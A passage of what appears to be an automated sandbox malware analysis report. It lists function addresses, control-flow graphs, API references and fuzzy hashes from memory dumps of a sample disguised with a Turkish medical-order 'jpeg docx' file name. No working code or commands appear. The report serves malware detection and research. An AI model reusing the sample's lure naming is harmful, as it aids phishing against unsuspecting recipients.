                                                                                                                          • Instruction Fuzzy Hash: 07125B30A10209DFDB29CF69D984AAEBBF2FF88714F148559E6259B361D730ED41CB90
                                                                                                                          Function 01245F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 566 1245f38-1245f5a 567 1245f70-1245f7b 566->567 568 1245f5c-1245f60 566->568 571 1245f81-1245f83 567->571 572 1246023-124604f 567->572 569 1245f62-1245f6e 568->569 570 1245f88-1245f8f 568->570 569->567 569->570 574 1245f91-1245f98 570->574 575 1245faf-1245fb8 570->575 573 124601b-1246020 571->573 579 1246056-12460ae 572->579 574->575 577 1245f9a-1245fa5 574->577 645 1245fba call 1245f37 575->645 646 1245fba call 1245f38 575->646 577->579 580 1245fab-1245fad 577->580 578 1245fc0-1245fc2 581 1245fc4-1245fc8 578->581 582 1245fca-1245fd2 578->582 598 12460b0-12460b6 579->598 599 12460bd-12460cf 579->599 580->573 581->582 584 1245fe5-1246004 call 12469af 581->584 585 1245fd4-1245fd9 582->585 586 1245fe1-1245fe3 582->586 592 1246006-124600f 584->592 593 1246019 584->593 585->586 586->573 652 1246011 call 124afad 592->652 653 1246011 call 124aeff 592->653 593->573 595 1246017 595->573 598->599 601 12460d5-12460d9 599->601 602 1246163-1246165 599->602 603 12460e9-12460f6 601->603 604 12460db-12460e7 601->604 648 1246167 call 1246337 602->648 649 1246167 call 1246347 602->649 650 1246167 call 1246300 602->650 651 1246167 call 12462f0 602->651 612 12460f8-1246102 603->612 604->612 605 124616d-1246173 606 1246175-124617b 605->606 607 124617f-1246186 605->607 610 12461e1-1246240 606->610 611 124617d 606->611 627 1246247-124625e 610->627 611->607 615 1246104-1246113 612->615 616 124612f-1246133 612->616 625 1246115-124611c 615->625 626 1246123-124612d 615->626 617 1246135-124613b 616->617 618 124613f-1246143 616->618 621 124613d 617->621 622 1246189-12461da 617->622 618->607 623 1246145-1246149 618->623 621->607 622->610 623->627 628 124614f-1246161 623->628 625->626 626->616 628->607 645->578 646->578 648->605 649->605 650->605 651->605 652->595 653->595
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Hq$Hq
                                                                                                                          • API String ID: 0-925789375
                                                                                                                          • Opcode ID: 6ba00cf0170f8d38010d173585f7fd19a3c1206d13a7c3d8e0cd439a8172981c
                                                                                                                          • Instruction ID: 7b75eac22ce56321e045cf3032922f5c16c1b21c9de0783a57ef1c2bd5adb407
                                                                                                                          • Opcode Fuzzy Hash: 6ba00cf0170f8d38010d173585f7fd19a3c1206d13a7c3d8e0cd439a8172981c
                                                                                                                          • Instruction Fuzzy Hash: 9391E1307142028FEB1A9F39D85476E7BB2BFCA300F188969E5468B395DB34CC46C791
                                                                                                                          Function 01246498 Relevance: 2.7, Strings: 2, Instructions: 198COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 712 1246498-12464a5 713 12464a7-12464ab 712->713 714 12464ad-12464af 712->714 713->714 715 12464b4-12464bf 713->715 716 12466c0-12466c7 714->716 717 12464c5-12464cc 715->717 718 12466c8 715->718 719 1246661-1246667 717->719 720 12464d2-12464e1 717->720 722 12466cd-12466d9 718->722 723 124666d-1246671 719->723 724 1246669-124666b 719->724 721 12464e7-12464f6 720->721 720->722 731 12464f8-12464fb 721->731 732 124650b-124650e 721->732 730 12466e1 722->730 725 1246673-1246679 723->725 726 12466be 723->726 724->716 725->718 728 124667b-124667e 725->728 726->716 728->718 733 1246680-1246695 728->733 730->730 735 124651a-1246520 731->735 736 12464fd-1246500 731->736 734 1246510-1246513 732->734 732->735 747 1246697-124669d 733->747 748 12466b9-12466bc 733->748 737 1246515 734->737 738 1246566-124656c 734->738 740 1246522-1246528 735->740 741 1246538-1246555 735->741 742 1246506 736->742 743 1246601-1246607 736->743 746 124662c-1246639 737->746 744 1246584-1246596 738->744 745 124656e-1246574 738->745 749 124652c-1246536 740->749 750 124652a 740->750 779 124655e-1246561 741->779 742->746 751 124661f-1246629 743->751 752 1246609-124660f 743->752 769 12465a6-12465c9 744->769 770 1246598-12465a4 744->770 753 1246576 745->753 754 1246578-1246582 745->754 766 124664d-124664f 746->766 767 124663b-124663f 746->767 755 12466af-12466b2 747->755 756 124669f-12466ad 747->756 748->716 749->741 750->741 751->746 758 1246611 752->758 759 1246613-124661d 752->759 753->744 754->744 755->718 762 12466b4-12466b7 755->762 756->718 756->755 758->751 759->751 762->747 762->748 774 1246653-1246656 766->774 767->766 773 1246641-1246645 767->773 769->718 782 12465cf-12465d2 769->782 780 12465f1-12465ff 770->780 773->718 775 124664b 773->775 774->718 776 1246658-124665b 774->776 775->774 776->719 776->720 779->746 780->746 782->718 784 12465d8-12465ea 782->784 784->780
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,q$,q
                                                                                                                          • API String ID: 0-1667412543
                                                                                                                          • Opcode ID: 79e69f983acc4d6c77870b987efc14436d94b2cb4a1d41c7cf5a9f3fde4118b4
                                                                                                                          • Instruction ID: 6da012b494570cb0c42f8df9d7fe6bf878c88e3c731e2664571c9ce116f80e91
                                                                                                                          • Opcode Fuzzy Hash: 79e69f983acc4d6c77870b987efc14436d94b2cb4a1d41c7cf5a9f3fde4118b4
                                                                                                                          • Instruction Fuzzy Hash: 0E71AF74E20506CFDB18CF6DC4849ADBBB2BF8A200B148169D616EB365DB35E841CFA1
                                                                                                                          Function 01243CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Xq$Xq
                                                                                                                          • API String ID: 0-1556399337
                                                                                                                          • Opcode ID: d7682bc7d4b79aa985263416e0fe5bd78e767fa2c82f6f481b4866e717790972
                                                                                                                          • Instruction ID: 0936aad59e50967241f131d4f2424096e26728804dcc583b5c06ee916496d0f0
                                                                                                                          • Opcode Fuzzy Hash: d7682bc7d4b79aa985263416e0fe5bd78e767fa2c82f6f481b4866e717790972
                                                                                                                          • Instruction Fuzzy Hash: 0031F531B20336CBEF2CC66A989527EA5EABBC4210F184039DA57C7384DFB4CC4587A5
                                                                                                                          Function 01248EF8 Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $q$$q
                                                                                                                          • API String ID: 0-3126353813
                                                                                                                          • Opcode ID: 96a6395ee5f9f1da2f20f6a4bedec625a9d2e23896fad3b66349a49df09796b7
                                                                                                                          • Instruction ID: ab45df27850d5556f0c180377d2ed709531dd3ed5d026f7fcb3f42df4ea81218
                                                                                                                          • Opcode Fuzzy Hash: 96a6395ee5f9f1da2f20f6a4bedec625a9d2e23896fad3b66349a49df09796b7
                                                                                                                          • Instruction Fuzzy Hash: 2231E7307302128FDB2E8BAED84063E77A7FF846107A6055AF317CB293EA24CC818755
                                                                                                                          Function 01249D57 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'q$4'q
                                                                                                                          • API String ID: 0-1467158625
                                                                                                                          • Opcode ID: acb99195620dff9a331ccbb5c84fdd1b1da924af3f94cec907338bb168720b28
                                                                                                                          • Instruction ID: db297b68d35b5e0298fb3f1119268396b0fb9470fd7433c79b8500be6518a45c
                                                                                                                          • Opcode Fuzzy Hash: acb99195620dff9a331ccbb5c84fdd1b1da924af3f94cec907338bb168720b28
                                                                                                                          • Instruction Fuzzy Hash: 86F0A9353002056FDF186A6A6854ABFBB9BEBDC250B148429BA49C7340DE61CC52C760
                                                                                                                          Function 01240C8F Relevance: 1.8, Strings: 1, Instructions: 541COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LRq
                                                                                                                          • API String ID: 0-3187445251
                                                                                                                          • Opcode ID: 7095f664e93aad3e191523ef0bd8d62feff8b67b4e20b5b9fc7e72092d5ca2df
                                                                                                                          • Instruction ID: 85a213bd369825e835a377e180b0101055d0a7abf3ffd6bbf64c0560f46fd433
                                                                                                                          • Opcode Fuzzy Hash: 7095f664e93aad3e191523ef0bd8d62feff8b67b4e20b5b9fc7e72092d5ca2df
                                                                                                                          • Instruction Fuzzy Hash: DB52F878A0122ACFCB64EF25F984A9DB7B2FB48301F1086A5D909A7358DB306D95CF51
                                                                                                                          Function 01240C99 Relevance: 1.8, Strings: 1, Instructions: 541COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LRq
                                                                                                                          • API String ID: 0-3187445251
                                                                                                                          • Opcode ID: 29aa63791cf736051710be83676d4f9db809d579f2bbee4b13a6c9fd6795bf09
                                                                                                                          • Instruction ID: d5684e598c935efec3ed14ccd250da8f1aa4c1774b715e0703399753e63b8d04
                                                                                                                          • Opcode Fuzzy Hash: 29aa63791cf736051710be83676d4f9db809d579f2bbee4b13a6c9fd6795bf09
                                                                                                                          • Instruction Fuzzy Hash: 9B52F878E0122ACFCB64EF25F984A9DB7B2FB48301F1086A5D909A7358DB306D95CF51
                                                                                                                          Function 01240CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LRq
                                                                                                                          • API String ID: 0-3187445251
                                                                                                                          • Opcode ID: bf329a0b2669f5478031d85c1003cd03155bbff01f5af51db323426564b95898
                                                                                                                          • Instruction ID: 2a39dd24d3f2327f6f4c22669943d76fa29dd7f20c71e1c57cf6cad945c8f9f4
                                                                                                                          • Opcode Fuzzy Hash: bf329a0b2669f5478031d85c1003cd03155bbff01f5af51db323426564b95898
                                                                                                                          • Instruction Fuzzy Hash: 5152F878A0122ACFCB64EF25F984A9DB7B2FB48301F1086A5D909A7358DB306D95CF51
                                                                                                                          Function 00F3CA9C Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3780800975.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_f30000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 220874293-0
                                                                                                                          • Opcode ID: 22e62ed8e56ab9cd9a440243c1f1f7e56ca158e883548210f6009ff455390fe8
                                                                                                                          • Instruction ID: f95840d1b54b9772532853449c7fa7776aa45e179c4a42455c76e56d191477df
                                                                                                                          • Opcode Fuzzy Hash: 22e62ed8e56ab9cd9a440243c1f1f7e56ca158e883548210f6009ff455390fe8
                                                                                                                          • Instruction Fuzzy Hash: D63132B0D01248DFDB28CFA9D884BDDBBF5BB48714F208019E404BB294D7B5A845CFA5
                                                                                                                          Function 00F3CF6D Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3780800975.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_f30000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Clipboard
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 220874293-0
                                                                                                                          • Opcode ID: 7a029fc40cae8651309526444c316f22db75d8f2d9eba1c56768231db15fcc03
                                                                                                                          • Instruction ID: 182005913857fcf82f4bc063b9d971b9262adc7a5e6aed1c17e32d6ccc94d355
                                                                                                                          • Opcode Fuzzy Hash: 7a029fc40cae8651309526444c316f22db75d8f2d9eba1c56768231db15fcc03
                                                                                                                          • Instruction Fuzzy Hash: 293132B0D01248DFDB28CFA9D984BDDBBF1BF48714F24806AE004AB294D7B5A945CF55
                                                                                                                          Function 00F3B238 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,00F3B957), ref: 00F3C3DD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3780800975.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_f30000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DispatchMessage
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2061451462-0
                                                                                                                          • Opcode ID: 18d9dba4f1d9882254f6922aee95ca6c573694cc5d423f4161ce292bb82fea55
                                                                                                                          • Instruction ID: a6cce82762742e43908d26a7eab846dc684c59b7d28acaf4e210e368689bfce9
                                                                                                                          • Opcode Fuzzy Hash: 18d9dba4f1d9882254f6922aee95ca6c573694cc5d423f4161ce292bb82fea55
                                                                                                                          • Instruction Fuzzy Hash: 5411E0B5C046498FCB20DFAAD444BDEBBF4EB48324F10841AE459B7200D379A544CFA5
                                                                                                                          Function 00F3A200 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00F3B065
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3780800975.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_f30000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: ab9f58725af1806fbc240fe5d14a32fd38a5f247b81ecfe41b4fba75c138156b
                                                                                                                          • Instruction ID: bdd005edd94ff9f83a51dfb297ce0a3edb8cafd71f1d09281e75bd83165ee935
                                                                                                                          • Opcode Fuzzy Hash: ab9f58725af1806fbc240fe5d14a32fd38a5f247b81ecfe41b4fba75c138156b
                                                                                                                          • Instruction Fuzzy Hash: 131103B5D00348CFDB24DFAAC584B9EBBF4EB48324F208459E519A7300D379A944CFA9
                                                                                                                          Function 00F3C378 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,00F3B957), ref: 00F3C3DD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3780800975.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_f30000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DispatchMessage
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2061451462-0
                                                                                                                          • Opcode ID: 4873f8518222cf08d9161bc1fc83a5fc928c28e26af71befacffc661b52bdc1a
                                                                                                                          • Instruction ID: 1e78e7d983b3110c96ff73fd8a7baebf8f4ee13a05b7515e26dbde7dd9c34cfd
                                                                                                                          • Opcode Fuzzy Hash: 4873f8518222cf08d9161bc1fc83a5fc928c28e26af71befacffc661b52bdc1a
                                                                                                                          • Instruction Fuzzy Hash: 5411E0B5C046498FCB24DFAAD844BCEFBF4EB48324F20851AD469A7250D379A544CFA5
                                                                                                                          Function 00F3B008 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00F3B065
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3780800975.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_f30000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2538663250-0
                                                                                                                          • Opcode ID: 1c390360eae752dd4b3370556682dc31f84f68fc47870498adcc0390075d06a8
                                                                                                                          • Instruction ID: c7fc52318a4bfea75f9064497b7e0e1247319528258a24bc01a765e3f650cdbe
                                                                                                                          • Opcode Fuzzy Hash: 1c390360eae752dd4b3370556682dc31f84f68fc47870498adcc0390075d06a8
                                                                                                                          • Instruction Fuzzy Hash: AC1112B5C00348CFDB20CFAAC484BCEBBF4EB48324F20845AD519A7250D379A944CFA9
                                                                                                                          Function 0124AEFF Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (oq
                                                                                                                          • API String ID: 0-1999159160
                                                                                                                          • Opcode ID: 1408f3ed4ee0e9745c62a066e0b61f4f196eed0eadfd66f328ef5d040ee6a5d1
                                                                                                                          • Instruction ID: 36510e2aaf8ca043281f9e30841dbd3ad77a020d88fc8a56760763d0a83bda5d
                                                                                                                          • Opcode Fuzzy Hash: 1408f3ed4ee0e9745c62a066e0b61f4f196eed0eadfd66f328ef5d040ee6a5d1
                                                                                                                          • Instruction Fuzzy Hash: 3B412731B102048FDB199B79D8146AEBBF6BFCC211F18446AEA16DB390CE319C15CBA0
                                                                                                                          Function 0124AA97 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'q
                                                                                                                          • API String ID: 0-1807707664
                                                                                                                          • Opcode ID: 8678a43a1a5091397d111236b02cd62d81626f8e521e32403d1dc908277736ff
                                                                                                                          • Instruction ID: 24d5a4b0eccab62391fc419435654c54cd8121050584fb7005e7980e0bb506dc
                                                                                                                          • Opcode Fuzzy Hash: 8678a43a1a5091397d111236b02cd62d81626f8e521e32403d1dc908277736ff
                                                                                                                          • Instruction Fuzzy Hash: 54416D746902158FDB19DF29D888AAE7BB2FF58710F104869FA06CB3A1DB70DC51CB51
                                                                                                                          Function 0124E2A7 Relevance: .6, Instructions: 647COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a959a545e455147fe49a0a9245a0cee0e89e78b5394348bd578e6475f7f32d54
                                                                                                                          • Instruction ID: 6d616117a9673294e65b642e1a2b1309bf4938430c1de629bf74a7166ae990c4
                                                                                                                          • Opcode Fuzzy Hash: a959a545e455147fe49a0a9245a0cee0e89e78b5394348bd578e6475f7f32d54
                                                                                                                          • Instruction Fuzzy Hash: 2D1299358E13478FE654AF72E5BC02ABB61FB1F327B886C90E50F848459B7504ED8B61
                                                                                                                          Function 0124E2A8 Relevance: .6, Instructions: 647COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: bc58595df454de657949c3a12b7616ee739a053460e395c00c0a41d220a80d89
                                                                                                                          • Instruction ID: 57eb863f9a5b4666aa6dd3221befcf6e3b8b373e2419b430b96d13d4dcae087f
                                                                                                                          • Opcode Fuzzy Hash: bc58595df454de657949c3a12b7616ee739a053460e395c00c0a41d220a80d89
                                                                                                                          • Instruction Fuzzy Hash: 2312A9358E13478FE654AF72E5BC02ABB61FB1F327B886C90E50F848459B3504ED8B61
                                                                                                                          Function 0124A62F Relevance: .4, Instructions: 357COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7eed7cbcc85731a5a7463bce536da17fe06a2254681d4f2e21b6dc5766e9946f
                                                                                                                          • Instruction ID: 27121d00df042f39a9994335d742e04315364eb78241f1581cf2a6b1c79c0fed
                                                                                                                          • Opcode Fuzzy Hash: 7eed7cbcc85731a5a7463bce536da17fe06a2254681d4f2e21b6dc5766e9946f
                                                                                                                          • Instruction Fuzzy Hash: F7E1803569051ACFCB19CF98C694AAEBBF2FF88300F158955E5069B3A6C730EC81CB51
                                                                                                                          Function 0124A0F8 Relevance: .2, Instructions: 215COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c461e0c4d8ab7e21217d9b837c47555b9ef49d642c4c8f29686cd1c042ec8f9d
                                                                                                                          • Instruction ID: 6a623241bbcb4e6664813af7ae5e68b08574f9ec11b5807a0b1800a89d7cb05c
                                                                                                                          • Opcode Fuzzy Hash: c461e0c4d8ab7e21217d9b837c47555b9ef49d642c4c8f29686cd1c042ec8f9d
                                                                                                                          • Instruction Fuzzy Hash: A691BC74A1061ACFCF1ACF98C8849DEBFF5FF88300F10856AE916AB251D771A965CB50
                                                                                                                          Function 012480D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8514cf1e15b537a7b20cca2522fb3714f4a80346437f4d41c435001de3f3ba8e
                                                                                                                          • Instruction ID: b2aff494edc43a0a43e423c5d09b6078e3565f342c06e42a14f2f82ada6a26e0
                                                                                                                          • Opcode Fuzzy Hash: 8514cf1e15b537a7b20cca2522fb3714f4a80346437f4d41c435001de3f3ba8e
                                                                                                                          • Instruction Fuzzy Hash: 07715B347606468FDB19DFADC894A6E7BE6BF89200F1504AAEA06DB371DB70DC41CB50
                                                                                                                          Function 0124F5D7 Relevance: .1, Instructions: 147COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e3a9cb093e91b0483ef07114beff4dc14289360de83cc42646e3b3a0006ae670
                                                                                                                          • Instruction ID: 8ade89c8f854db5ce4829f097ed1eebe5abee20866bd1cf97a000f70d84513f3
                                                                                                                          • Opcode Fuzzy Hash: e3a9cb093e91b0483ef07114beff4dc14289360de83cc42646e3b3a0006ae670
